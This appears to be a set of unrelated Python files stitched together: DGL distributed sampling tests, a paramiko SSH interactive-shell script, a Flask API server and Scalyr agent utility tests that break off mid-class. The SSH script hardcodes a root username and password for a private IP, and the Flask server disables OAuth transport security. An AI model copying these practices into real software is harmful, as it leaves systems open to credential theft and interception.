ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64)
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64)
for i in range(num_server):
part, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_sampling_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), num_server)
def check_standalone_sampling(tmpdir):
g = CitationGraphDataset("cora")[0]
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname))
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
dgl.distributed.initialize("rpc_ip_config.txt", 1)
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("test_in_subgraph", gpb=gpb)
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
subg1 = dgl.in_subgraph(g, nodes)
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_sampling(Path(tmpdirname))
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_in_subgraph(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
check_rpc_find_edges(Path(tmpdirname), 2)
check_rpc_find_edges(Path(tmpdirname), 1)
|
tests.py
|
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
import socket
import sys
from paramiko.py3compat import u
import paramiko
# windows does not have termios...
try:
import termios
import tty
has_termios = True
except ImportError:
has_termios = False
def interactive_shell(chan):
if has_termios:
posix_shell(chan)
else:
windows_shell(chan)
def posix_shell(chan):
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
# thanks to Mike Looijmans for this code
def windows_shell(chan):
import threading
sys.stdout.write("Line-buffered terminal emulation. Press F6 or ^Z to send EOF.\r\n\r\n")
def writeall(sock):
while True:
data = sock.recv(256)
if not data:
sys.stdout.write('\r\n*** EOF ***\r\n\r\n')
sys.stdout.flush()
break
sys.stdout.write(data)
sys.stdout.flush()
writer = threading.Thread(target=writeall, args=(chan,))
writer.start()
try:
while True:
d = sys.stdin.read(1)
if not d:
break
chan.send(d)
except EOFError:
# user hit ^Z or F6
pass
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
print('*** Connecting...')
hostname = "172.22.202.204"
password = "Passw0rd"
username = "root"
port = 22
client.connect(hostname, port, username, password)
chan = client.invoke_shell()
interactive_shell(chan)
|
server.py
|
import asyncio
try:
import ujson as json
except ImportError:
import json
import os
import threading
import traceback
import rethinkdb as r
from flask import Flask, render_template, request, g, jsonify, make_response
from dashboard import dash
from utils.db import get_db, get_redis
from utils.ratelimits import ratelimit, endpoint_ratelimit
from utils.exceptions import BadRequest
from sentry_sdk import capture_exception
# Initial require, the above line contains our endpoints.
config = json.load(open('config.json'))
endpoints = None
app = Flask(__name__, template_folder='views', static_folder='views/assets')
app.register_blueprint(dash)
app.config['SECRET_KEY'] = config['client_secret']
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = 'true'
if 'sentry_dsn' in config:
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(config['sentry_dsn'],
integrations=[FlaskIntegration()])
@app.before_first_request
def init_app():
def run_gc_forever(loop):
asyncio.set_event_loop(loop)
try:
loop.run_forever()
except (SystemExit, KeyboardInterrupt):
loop.close()
gc_loop = asyncio.new_event_loop()
gc_thread = threading.Thread(target=run_gc_forever, args=(gc_loop,))
gc_thread.start()
g.gc_loop = gc_loop
from utils.endpoint import endpoints as endpnts
global endpoints
endpoints = endpnts
import endpoints as _ # noqa: F401
def require_authorization(func):
def wrapper(*args, **kwargs):
if r.table('keys').get(request.headers.get('authorization', '')).coerce_to('bool').default(False).run(get_db()):
return func(*args, **kwargs)
return jsonify({'status': 401, 'error': 'You are not authorized to access this endpoint'}), 401
return wrapper
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'rdb'):
g.rdb.close()
@app.route('/', methods=['GET'])
def index():
data = {}
for endpoint in endpoints:
data[endpoint] = {'hits': get_redis().get(endpoint + ':hits') or 0,
'avg_gen_time': endpoints[endpoint].get_avg_gen_time()}
return render_template('index.html', data=data)
@app.route('/endpoints.json', methods=['GET'])
def endpoints():
return jsonify({"endpoints": [{'name': x, 'parameters': y.params, 'ratelimit': f'{y.rate}/{y.per}s'} for x, y in endpoints.items()]})
@app.route('/documentation')
def docs():
return render_template('docs.html', url=request.host_url, data=sorted(endpoints.items()))
@app.route('/api/<endpoint>', methods=['GET', 'POST'])
@require_authorization
@ratelimit
def api(endpoint):
if endpoint not in endpoints:
return jsonify({'status': 404, 'error': 'Endpoint {} not found!'.format(endpoint)}), 404
if request.method == 'GET':
text = request.args.get('text', '')
avatars = [x for x in [request.args.get('avatar1', request.args.get('image', None)),
request.args.get('avatar2', None)] if x]
usernames = [x for x in [request.args.get('username1', None), request.args.get('username2', None)] if x]
kwargs = {}
for arg in request.args:
if arg not in ['text', 'username1', 'username2', 'avatar1', 'avatar2']:
kwargs[arg] = request.args.get(arg)
else:
if not request.is_json:
return jsonify({'status': 400, 'message': 'when submitting a POST request you must provide data in the '
'JSON format'}), 400
request_data = request.json
text = request_data.get('text', '')
avatars = list(request_data.get('avatars', list(request_data.get('images', []))))
usernames = list(request_data.get('usernames', []))
kwargs = {}
for arg in request_data:
if arg not in ['text', 'avatars', 'usernames']:
kwargs[arg] = request_data.get(arg)
cache = endpoints[endpoint].bucket
max_usage = endpoints[endpoint].rate
e_r = endpoint_ratelimit(auth=request.headers.get('Authorization', None), cache=cache, max_usage=max_usage)
if e_r['X-RateLimit-Remaining'] == -1:
x = make_response((jsonify({'status': 429, 'error': 'You are being ratelimited'}), 429,
{'X-RateLimit-Limit': e_r['X-RateLimit-Limit'],
'X-RateLimit-Remaining': 0,
'X-RateLimit-Reset': e_r['X-RateLimit-Reset'],
'Retry-After': e_r['Retry-After']}))
return x
try:
result = endpoints[endpoint].run(key=request.headers.get('authorization'),
text=text,
avatars=avatars,
usernames=usernames,
kwargs=kwargs)
except BadRequest as br:
traceback.print_exc()
if 'sentry_dsn' in config:
capture_exception(br)
return jsonify({'status': 400, 'error': str(br)}), 400
except IndexError as e:
traceback.print_exc()
if 'sentry_dsn' in config:
capture_exception(e)
return jsonify({'status': 400, 'error': str(e) + '. Are you missing a parameter?'}), 400
except Exception as e:
traceback.print_exc()
if 'sentry_dsn' in config:
capture_exception(e)
return jsonify({'status': 500, 'error': str(e)}), 500
result.headers.add('X-RateLimit-Limit', max_usage)
result.headers.add('X-RateLimit-Remaining', e_r['X-RateLimit-Remaining'])
result.headers.add('X-RateLimit-Reset', e_r['X-RateLimit-Reset'])
return result, 200
if __name__ == '__main__':
app.run(debug=False, use_reloader=False)
|
util_test.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: Steven Czerwinski <czerwin@scalyr.com>
from __future__ import unicode_literals
from __future__ import absolute_import
from scalyr_agent import compat
__author__ = "czerwin@scalyr.com"
from io import open
import re
from scalyr_agent import scalyr_init
scalyr_init()
import sys
import datetime
import os
import tempfile
import threading
import uuid
import mock
from mock import patch, MagicMock
import six
import scalyr_agent.util as scalyr_util
from scalyr_agent.util import (
JsonReadFileException,
RateLimiter,
FakeRunState,
ScriptEscalator,
HistogramTracker,
)
from scalyr_agent.util import (
StoppableThread,
RedirectorServer,
RedirectorClient,
RedirectorError,
)
from scalyr_agent.util import verify_and_get_compress_func
from scalyr_agent.util import get_compress_and_decompress_func
from scalyr_agent.json_lib import JsonObject
from scalyr_agent.test_base import ScalyrTestCase
from scalyr_agent.test_base import skipIf
from scalyr_agent.test_base import BaseScalyrLogCaptureTestCase
from scalyr_agent import scalyr_logging
class TestUtilCompression(ScalyrTestCase):
def setUp(self):
super(TestUtilCompression, self).setUp()
self._data = b"The rain in spain. " * 1000
def test_compression_none(self):
data = self._data
compress = verify_and_get_compress_func("none")
self.assertIsNotNone(compress)
self.assertEqual(data, compress(data))
compress_func, decompress_func = get_compress_and_decompress_func("none")
self.assertIsNotNone(compress_func)
self.assertIsNotNone(decompress_func)
self.assertEqual(data, compress_func(data))
self.assertEqual(data, decompress_func(data))
self.assertEqual(data, decompress_func(compress_func(data)))
def test_zlib(self):
"""Successful zlib compression"""
data = self._data
compress = verify_and_get_compress_func("deflate")
self.assertIsNotNone(compress)
import zlib
self.assertEqual(data, zlib.decompress(compress(data)))
def test_bz2(self):
"""Successful bz2 compression"""
data = self._data
compress = verify_and_get_compress_func("bz2")
self.assertIsNotNone(compress)
import bz2
self.assertEqual(data, bz2.decompress(compress(data)))
@skipIf(sys.version_info < (2, 7, 0), "Skipping Python < 2.7")
def test_lz4(self):
data = self._data
compress = verify_and_get_compress_func("lz4")
self.assertIsNotNone(compress)
import lz4.frame as lz4
self.assertEqual(data, lz4.decompress(compress(data)))
@skipIf(sys.version_info < (2, 7, 0), "Skipping Python < 2.7")
def test_zstandard(self):
data = self._data
compress = verify_and_get_compress_func("zstandard")
self.assertIsNotNone(compress)
import zstandard
decompressor = zstandard.ZstdDecompressor()
self.assertEqual(data, decompressor.decompress(compress(data)))
def test_bad_compression_type(self):
"""User enters unsupported compression type"""
self.assertIsNone(verify_and_get_compress_func("bad_compression_type"))
def test_bad_compression_lib_exception_on_import(self):
"""Pretend that import bz2/zlib raises exception"""
def _mock_get_compress_and_decompress_func(
compression_type, compression_level=9
):
raise Exception("Mimic exception when importing compression lib")
@patch(
"scalyr_agent.util.get_compress_and_decompress_func",
new=_mock_get_compress_and_decompress_func,
)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test("deflate")
_test("bz2")
_test("lz4")
_test("zstandard")
def test_bad_compression_lib_no_compression(self):
"""Pretend that the zlib/bz2 library compress() method doesn't perform any comnpression"""
def _mock_get_compress_and_decompress_func(
compression_type, compression_level=9
):
m = MagicMock()
# simulate module.compress() method that does not compress input data string
m.compress = lambda data, compression_level=9: data
m.decompress = lambda data: data
return m.compress, m.decompress
@patch(
"scalyr_agent.util.get_compress_and_decompress_func",
new=_mock_get_compress_and_decompress_func,
)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test("deflate")
_test("bz2")
_test("lz4")
_test("zstandard")
class TestUtil(ScalyrTestCase):
def setUp(self):
super(TestUtil, self).setUp()
self.__tempdir = tempfile.mkdtemp()
self.__path = os.path.join(self.__tempdir, "testing.json")
def test_read_file_as_json(self):
self.__create_file(self.__path, '{ "a": "hi"}')
value = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(value, {"a": "hi"})
def test_read_config_file_as_json(self):
self.__create_file(self.__path, '{ a: "hi"} // Test')
json_object = scalyr_util.read_config_file_as_json(self.__path)
self.assertEquals(json_object, JsonObject(a="hi"))
def test_read_file_as_json_no_file(self):
self.assertRaises(JsonReadFileException, scalyr_util.read_file_as_json, "foo")
def test_read_file_as_json_with_bad_json(self):
self.__create_file(self.__path, "{ a: hi}")
self.assertRaises(
JsonReadFileException, scalyr_util.read_file_as_json, self.__path
)
def test_read_file_as_json_with_strict_utf8_json(self):
# 2->TODO python3 json libs do not allow serialization with invalid UTF-8.
with open(self.__path, "wb") as f:
f.write(b'{ a: "\x96"}')
self.assertRaises(
JsonReadFileException, scalyr_util.read_file_as_json, self.__path, True
)
def test_atomic_write_dict_as_json_file(self):
info = {"a": "hi"}
scalyr_util.atomic_write_dict_as_json_file(self.__path, self.__path + "~", info)
json_object = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(json_object, info)
def __create_file(self, path, contents):
fp = open(path, "w")
fp.write(contents)
fp.close()
def test_seconds_since_epoch(self):
dt = datetime.datetime(2015, 8, 6, 14, 40, 56)
expected = 1438872056.0
actual = scalyr_util.seconds_since_epoch(dt)
self.assertEquals(expected, actual)
def test_microseconds_since_epoch(self):
dt = datetime.datetime(2015, 8, 6, 14, 40, 56, 123456)
expected = 1438872056123456
actual = scalyr_util.microseconds_since_epoch(dt)
self.assertEquals(expected, actual)
def test_uuid(self):
first = scalyr_util.create_unique_id()
second = scalyr_util.create_unique_id()
self.assertTrue(len(first) > 0)
self.assertTrue(len(second) > 0)
self.assertNotEqual(first, second)
def test_create_uuid3(self):
namespace = uuid.UUID("{aaaaffff-22c7-4d50-92c1-123456781234}")
self.assertEqual(
scalyr_util.create_uuid3(namespace, "test-string"),
uuid.UUID("{72a49a0a-d92e-383c-a88b-2060e372e1af}"),
)
def test_remove_newlines_and_truncate(self):
self.assertEquals(scalyr_util.remove_newlines_and_truncate("hi", 1000), "hi")
self.assertEquals(scalyr_util.remove_newlines_and_truncate("ok then", 2), "ok")
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("o\nk\n", 1000), "o k "
)
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("ok\n\r there", 1000), "ok there"
)
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("ok\n\r there", 6), "ok t"
)
def test_is_list_of_strings_yes(self):
self.assertTrue(scalyr_util.is_list_of_strings(["*", "blah", "dah"]))
def test_is_list_of_strings_no(self):
self.assertFalse(scalyr_util.is_list_of_strings(["*", 3, {"blah": "dah"}]))
def test_is_list_of_strings_none(self):
self.assertFalse(scalyr_util.is_list_of_strings(None))
def test_value_to_bool(self):
self.assertTrue(scalyr_util.value_to_bool(True))
self.assertTrue(scalyr_util.value_to_bool(1))
self.assertFalse(scalyr_util.value_to_bool(0))
self.assertRaises(ValueError, scalyr_util.value_to_bool, 100)
self.assertTrue(scalyr_util.value_to_bool("something"))
self.assertFalse(scalyr_util.value_to_bool("f"))
self.assertFalse(scalyr_util.value_to_bool("False"))
self.assertFalse(scalyr_util.value_to_bool(""))
def test_get_parser_from_config_default(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
}
attributes = {"nothing": 0}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"default_parser",
)
def test_get_parser_from_config_hierarchy1(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"parser": "config_parser",
"attributes": {"parser": "config_attributes_parser"},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"config_attributes_parser",
)
def test_get_parser_from_config_hierarchy2(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"parser": "config_parser",
"attributes": {},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"config_parser",
)
def test_get_parser_from_config_hierarchy3(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"attributes": {},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"attributes_parser",
)
def test_get_web_url_from_upload_url(self):
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://agent.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://log.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://upload.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://app.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://agent.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://log.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://upload.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://app.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://logstaging.scalyr.com"),
"https://logstaging.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://logstaging.eu.scalyr.com"),
"https://logstaging.eu.scalyr.com",
)
class TestUtilWithLogCapture(BaseScalyrLogCaptureTestCase):
def setUp(self):
super(TestUtilWithLogCapture, self).setUp()
self.__logger = scalyr_logging.getLogger("util")
self.__logger.set_keep_last_record(False)
self.__tempdir = tempfile.mkdtemp()
self.__path = os.path.join(self.__tempdir, "testing.json")
self.__temp_file_path = self.__path + "~"
def test_atomic_write_dict_as_json_file_error(self):
# mock of the 'atomic_write_dict_as_json_file' internal funtion calls to raise an error
# and validate the error log message.
info = {"a": "hi"}
with patch("os.rename") as os_rename_mock:
os_rename_mock.side_effect = Exception("I am an error.")
scalyr_util.atomic_write_dict_as_json_file(
self.__path, self.__temp_file_path, info
)
self.assertLogFileContainsLineRegex(expression="I am an error.")
self.assertLogFileContainsLineRegex(
expression="File path: '{0}', type: {1}".format(
re.escape(self.__path), type(self.__path)
)
)
self.assertLogFileContainsLineRegex(
expression="Temporary file path: '{0}', type: {1}".format(
re.escape(self.__temp_file_path), type(self.__temp_file_path)
)
)
self.assertLogFileContainsLineRegex(expression="File exists: False.")
self.assertLogFileContainsLineRegex(expression="Temporary file exists: True.")
self.assertLogFileContainsLineRegex(
expression="File system encoding: {0}".format(
re.escape(sys.getfilesystemencoding())
)
)
class TestRateLimiter(ScalyrTestCase):
def setUp(self):
super(TestRateLimiter, self).setUp()
self.__test_rate = RateLimiter(100, 10, current_time=0)
self.__current_time = 0
self.__last_sleep_amount = -1
def advance_time(self, delta):
self.__current_time += delta
def charge_if_available(self, num_bytes):
return self.__test_rate.charge_if_available(
num_bytes, current_time=self.__current_time
)
def block_until_charge_succeeds(self, num_bytes):
return self.__test_rate.block_until_charge_succeeds(
num_bytes, current_time=self.__current_time
)
def test_basic_use(self):
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
def test_custom_bucket_size_and_rate(self):
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.assertTrue(self.charge_if_available(10))
self.assertFalse(self.charge_if_available(10))
self.advance_time(1)
self.assertFalse(self.charge_if_available(10))
self.advance_time(5)
self.assertFalse(self.charge_if_available(10))
def test_zero_bucket_fill_rate(self):
self.__test_rate = RateLimiter(100, 0, current_time=0)
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
self.advance_time(1)
self.assertFalse(self.charge_if_available(20))
self.advance_time(5)
self.assertFalse(self.charge_if_available(20))
def test_refill(self):
self.assertTrue(self.charge_if_available(60))
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertTrue(self.charge_if_available(60))
def fake_sleep(self, seconds):
self.__last_sleep_amount = seconds
self.advance_time(seconds)
def test_basic_use_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(80)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(1)
self.assertEqual(self.__last_sleep_amount, 0.1)
def test_custom_bucket_size_and_rate_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.block_until_charge_succeeds(10)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(10)
self.assertEqual(self.__last_sleep_amount, 10)
self.advance_time(15)
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, 10)
def test_zero_bucket_fill_rate_sleep(self):
self.__test_rate = RateLimiter(100, 0, current_time=0)
self.assertRaises(ValueError, self.block_until_charge_succeeds, 20)
def test_refill_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, 2)
self.advance_time(1)
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, 5)
def test_charge_greater_than_bucket_size_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, 10)
class TestRunState(ScalyrTestCase):
def test_basic_use(self):
# We use a FakeRunState for testing just so we do not accidentally sleep.
run_state = FakeRunState()
self.assertTrue(run_state.is_running())
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 1)
run_state.stop()
self.assertFalse(run_state.is_running())
def test_sleeping_already_stopped(self):
run_state = FakeRunState()
run_state.stop()
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 0)
def test_callbacks(self):
self.called = False
def on_stop():
self.called = True
run_state = FakeRunState()
run_state.register_on_stop_callback(on_stop)
run_state.stop()
self.assertTrue(self.called)
# Make sure it is immediately invoked if already stopped.
self.called = False
run_state.register_on_stop_callback(on_stop)
self.assertTrue(self.called)
class TestStoppableThread(ScalyrTestCase):
def setUp(self):
super(TestStoppableThread, self).setUp()
self._run_counter = 0
def test_basic_use(self):
# Since the ScalyrTestCase sets the name prefix, we need to set it back to None to get an unmolested name.
StoppableThread.set_name_prefix(None)
test_thread = StoppableThread("Testing", self._run_method)
self.assertEqual(test_thread.getName(), "Testing")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix(self):
StoppableThread.set_name_prefix("test_name_prefix: ")
test_thread = StoppableThread("Testing", self._run_method)
self.assertEqual(test_thread.getName(), "test_name_prefix: Testing")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix_with_none(self):
StoppableThread.set_name_prefix("test_name_prefix: ")
test_thread = StoppableThread(target=self._run_method)
self.assertEqual(test_thread.getName(), "test_name_prefix: ")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_basic_extending(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, "Test thread")
def run_and_propagate(self):
self.run_counter += 1
while self._run_state.is_running():
self.run_counter += 1
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread = TestThread()
test_thread.start()
test_thread.stop()
self.assertTrue(test_thread.run_counter > 0)
def test_exception(self):
class TestException(Exception):
pass
def throw_an_exception(run_state):
run_state.is_running()
raise TestException()
test_thread = StoppableThread("Testing", throw_an_exception)
test_thread.start()
caught_it = False
try:
test_thread.stop()
except TestException:
caught_it = True
self.assertTrue(caught_it)
def test_is_alive(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, "Test thread")
def run_and_propagate(self):
while self._run_state.is_running():
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread_1 = TestThread()
test_thread_2 = StoppableThread("Testing", self._run_method)
test_threads = [test_thread_1, test_thread_2]
for test_thread in test_threads:
self.assertFalse(test_thread.isAlive())
if six.PY3:
self.assertFalse(test_thread.is_alive())
test_thread.start()
self.assertTrue(test_thread.isAlive())
if six.PY3:
self.assertTrue(test_thread.is_alive())
test_thread.stop()
self.assertFalse(test_thread.isAlive())
if six.PY3:
self.assertFalse(test_thread.is_alive())
def _run_method(self, run_state):
self._run_counter += 1
while run_state.is_running():
self._run_counter += 1
run_state.sleep_but_awaken_if_stopped(0.03)
def test_register_on_stop_callback(self):
self.callback_called = False
def fake_callback():
self.callback_called = True
run_state = scalyr_util.RunState()
run_state.register_on_stop_callback(fake_callback)
run_state.stop()
self.assertTrue(self.callback_called)
def test_remove_on_stop_callback(self):
self.callback_called = False
def fake_callback():
self.callback_called = True
run_state = scalyr_util.RunState()
run_state.register_on_stop_callback(fake_callback)
run_state.remove_on_stop_callback(fake_callback)
run_state.stop()
self.assertFalse(self.callback_called)
class TestScriptEscalator(ScalyrTestCase):
def tearDown(self):
